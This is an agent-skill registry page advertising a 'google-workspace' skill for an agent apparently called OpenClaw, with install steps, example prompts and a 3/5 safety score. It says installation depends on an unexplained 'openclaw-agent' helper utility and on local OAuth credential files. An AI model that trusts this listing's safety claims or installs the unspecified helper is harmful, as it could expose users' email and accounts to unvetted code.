ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified productivity Safety 3/5

google-workspace

Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.

Why use this skill?

Automate Google Workspace with OpenClaw. Manage Gmail, Calendar, Sheets, and Docs using this powerful integration skill for seamless daily productivity.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/google-workspace-wwxem
Or

What This Skill Does

The google-workspace skill provides a robust bridge between the OpenClaw agent and the Google Workspace ecosystem. It allows users to automate complex workflows across Gmail, Google Calendar, Sheets, Docs, and Contacts. By leveraging the official Google APIs, this skill enables the agent to read and compose emails, schedule meetings, manipulate spreadsheet data, generate document content, and manage contact lists directly through natural language commands.

Installation

Installation is a two-part process. First, run the command clawhub install openclaw/skills/skills/hightower6eu/google-workspace-wwxem to bring the skill into your local OpenClaw environment. Second, ensure you have initialized the openclaw-agent utility as specified in the documentation. This utility is mandatory for managing secure OAuth sessions. After installation, place your credentials.json (downloaded from the Google Cloud Console) into your root directory and run the helper script to authenticate via your web browser.

Use Cases

This skill is ideal for office automation and personal productivity. Common use cases include: summarizing daily email threads, auto-populating Google Sheets with task progress, drafting document templates based on recurring meeting notes, and syncing professional contacts from external databases directly into Google Contacts. It is particularly powerful for recurring tasks that require data extraction from emails and subsequent entry into spreadsheets or calendar events.

Example Prompts

  1. "Check my Gmail for any emails from the finance team today and summarize the main action items in a new Google Doc."
  2. "Schedule a one-hour meeting on my calendar with John Doe for next Tuesday at 10 AM, and add a brief description regarding the project kickoff."
  3. "Extract the sales data from the latest spreadsheet titled 'Q3 Reports' and send a quick update email to my manager with the totals."

Tips & Limitations

To ensure peak performance, keep your token.pickle file secure as it stores your session credentials. Be mindful of Google API quota limits if you are processing large volumes of data. Always verify that the necessary scopes (Gmail, Calendar, Drive, etc.) are enabled in your Google Cloud Console project settings, or the agent may encounter 'insufficient permissions' errors. Note that the skill relies on the openclaw-agent utility to handle authentication persistence; if the service is not running, the agent will be unable to refresh access tokens, causing connection timeouts.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-google-workspace-wwxem": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#google-workspace#automation#productivity#api#gmail
Safety Score: 3/5

Flags: network-access, file-write, file-read, external-api, code-execution